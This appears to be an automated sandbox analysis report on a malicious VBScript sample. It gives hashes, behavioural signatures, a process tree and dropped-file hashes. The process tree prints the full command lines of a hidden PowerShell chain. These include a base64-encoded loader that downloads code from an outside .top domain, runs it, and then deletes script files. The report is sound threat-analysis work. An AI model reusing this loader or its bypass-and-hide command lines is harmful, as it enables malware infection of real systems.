Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19/11/2024, 11:22
Static task
static1
Behavioral task
behavioral1
Sample
e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs
Resource
win10v2004-20241007-en
General
-
Target
e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs
-
Size
79KB
-
MD5
af1d73edd871bf6f26fa1561a95a0175
-
SHA1
235b37402a70e5c7626f6a73d33a7483c628c0ee
-
SHA256
e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37
-
SHA512
8c9bb59ceb94b7c10e4cd7741e5a0ce1d6206b0999a3cdd5befc364e25e38eb3497d930ab64e1f0c8b9b8103bfca195a9489cc331e165c10efddba1d17702c81
-
SSDEEP
768:vilsosMils8ZiBiMils4iBi5ilsMilsJiBiMilsJiBiwils2CBz/W3WFsMilsJiX:jCBz/09
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 22 4512 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 4732 powershell.exe 3332 powershell.exe 1604 powershell.exe 4512 powershell.exe 4236 powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4732 powershell.exe 4732 powershell.exe 3332 powershell.exe 3332 powershell.exe 1604 powershell.exe 1604 powershell.exe 4512 powershell.exe 4512 powershell.exe 4236 powershell.exe 4236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4732 powershell.exe Token: SeDebugPrivilege 3332 powershell.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4204 wrote to memory of 4732 4204 WScript.exe 93 PID 4204 wrote to memory of 4732 4204 WScript.exe 93 PID 4732 wrote to memory of 4756 4732 powershell.exe 95 PID 4732 wrote to memory of 4756 4732 powershell.exe 95 PID 4756 wrote to memory of 3332 4756 cmd.exe 96 PID 4756 wrote to memory of 3332 4756 cmd.exe 96 PID 3332 wrote to memory of 1604 3332 powershell.exe 97 PID 3332 wrote to memory of 1604 3332 powershell.exe 97 PID 1604 wrote to memory of 4512 1604 powershell.exe 98 PID 1604 wrote to memory of 4512 1604 powershell.exe 98 PID 4512 wrote to memory of 4236 4512 powershell.exe 99 PID 4512 wrote to memory of 4236 4512 powershell.exe 99
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\Admin\AppData\Roaming\dahcJGsr.bat"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /q /cC:\Users\Admin\AppData\Roaming\dahcJGsr.bat3⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\Admin\AppData\Roaming\dahcJGsr.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR1WGxJMVpzTzg2WmJESU5EQ3BuWXRrUWtjTjVsMXZMOXkzTDBLMDdaeHJZakpzbCA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokT29rN1RNMzZ5NllqID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBtbSk7CiRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0QWRkID0gMzsKSWYgKCRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ICsgJFNVeURUbkc1bWhBNnZxdEUyeUZKNTRBZGQgLWd0IDU5KSB7CiAgICAkT29rN1RNMzZ5NllqID0gJE9vazdUTTM2eTZZaiArIDE7CiAgICAkU1V5RFRuRzVtaEE2dnF0RTJ5Rko1NCA9ICRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ICsgJFNVeURUbkc1bWhBNnZxdEUyeUZKNTRBZGQgLSA2MDsKfSBFbHNlIHsKICAgICRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ID0gJFNVeURUbkc1bWhBNnZxdEUyeUZKNTQgKyAkU1V5RFRuRzVtaEE2dnF0RTJ5Rko1NEFkZDsKfTsKJE9vazdUTTM2eTZZaiA9IElmIChbaW50XShHZXQtRGF0ZSAtRm9ybWF0IEhIKSArIDEgLWd0IDIzKSB7IjAwIn0gRWxzZSB7JE9vazdUTTM2eTZZan07CiRVaEs3a29ibFowOW8wMmFiRnRQTTN4aERhZ2pCSGxmaHI3VzU5bm5FdXNKbTN5d3VuNEVGYnkwOXJPeWliTUxYID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCAxMiB8ICUge1tjaGFyXSRffSkpOwokVWh1b3liV1V6RVJvdDF2R0o5MUFkRFhmcmV0UjBmTndpcE5uRXZTM3FvVG51NkRqU0p1dzRPQ1Q3bk1iY3ZqaGtsRVpDUVhoM1hyWVhESzVyID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJFVoSzdrb2JsWjA5bzAyYWJGdFBNM3hoRGFnakJIbGZocjdXNTlubkV1c0ptM3l3dW40RUZieTA5ck95aWJNTFgpLnBzMSIgLUZvcmNlIAoiQDsKCiJwb3dlcnNoZWxsIC1ub3Byb2ZpbGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtYyAkKCRVaHVveWJXVXpFUm90MXZHSjkxQWREWGZyZXRSMGZOd2lwTm5FdlMzcW9UbnU2RGpTSnV3NE9DVDduTWJjdmpoa2xFWkNRWGgzWHJZWERLNXIpIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRVaEs3a29ibFowOW8wMmFiRnRQTTN4aERhZ2pCSGxmaHI3VzU5bm5FdXNKbTN5d3VuNEVGYnkwOXJPeWliTUxYKS5wczEiOwpwb3dlcnNoZWxsIC1ub3Byb2ZpbGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtRmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJFVoSzdrb2JsWjA5bzAyYWJGdFBNM3hoRGFnakJIbGZocjdXNTlubkV1c0ptM3l3dW40RUZieTA5ck95aWJNTFgpLnBzMQpSZW1vdmUtSXRlbSAiJGVudjpBUFBEQVRBXCoucHMxIiAtRm9yY2UKUmVtb3ZlLUl0ZW0gIiRlbnY6QVBQREFUQVwqLmJhdCIgLUZvcmNlCg==')) | iex"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\eRsFCMmvgfwp.ps16⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD58e42bec1f8f4c3705f1df36c21c85531
SHA1c9d6aac3c1b16ed12f22185ebdc9f921cd396d14
SHA256f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2
SHA512d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6
-
Filesize
1KB
MD5782e6de5514b8d845ea665268909b474
SHA124d88b65fb744147a84d371bc5a30fa26c7e89e5
SHA2561d8b97b9c79d910b03a568ae871c7236bc1eba4cd14c9ba5b66e8bd2d3931520
SHA512873a97d53ca527b21eaa8712274df108494c547cf31a599a71597468868403c5faba7a42a3225667deed0a2793f2a9f87dd4a0764d943a77684d144d17e9ba0f
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
127B
MD560fe766931fd35ab7ef71a58d050d151
SHA1093d3e8ad6589650791b076c293d83fd68a01258
SHA256a2655f4b7688d460aeead5969d386c9b233dd967d74a4b965ae881804ed63df6
SHA5125b6d1457f7ffa926c9a6ac1c70672611d076ca417c2879dc72d3d6b4f492d23cfc49d34d8cddebd8a2f863bedca2059ae679a9a31e418c3cab0952863fe972b4
-
Filesize
2KB
MD5674e9e7128df273743b820de0f086f39
SHA16ea3b3dd589f01aede4f2fc8cfea1025bb082c9c
SHA2569679e36b28e3d3d0452f1d41855ea65d7256701555624870ce6a4ad53d904be1
SHA512eb0a22da8ab8d981c92c98a1e7ad76f10974ccdf09c50d0f5c1f1df9e701e546b8e853754dde7a6c6f96e05255c1cc16558844946aa5d3e054ac5035ad9d20b2
-
Filesize
438B
MD5ee3d16fc08f5ca85284fa3ef16d3d64b
SHA13cbe0e66c214b0676b263972b790a4ce8f86f51a
SHA2565cf838a725c897738f316d2269ce5272f800ee49454c4b134d9a4281b5509ed9
SHA512f5e15666b09a78b9805c413ddd0a7eaac880017f1f6f180f275d577c4b001f133866b6c0517adda932ed9864aba2b6344a07c03ae8450878d338776bd4891178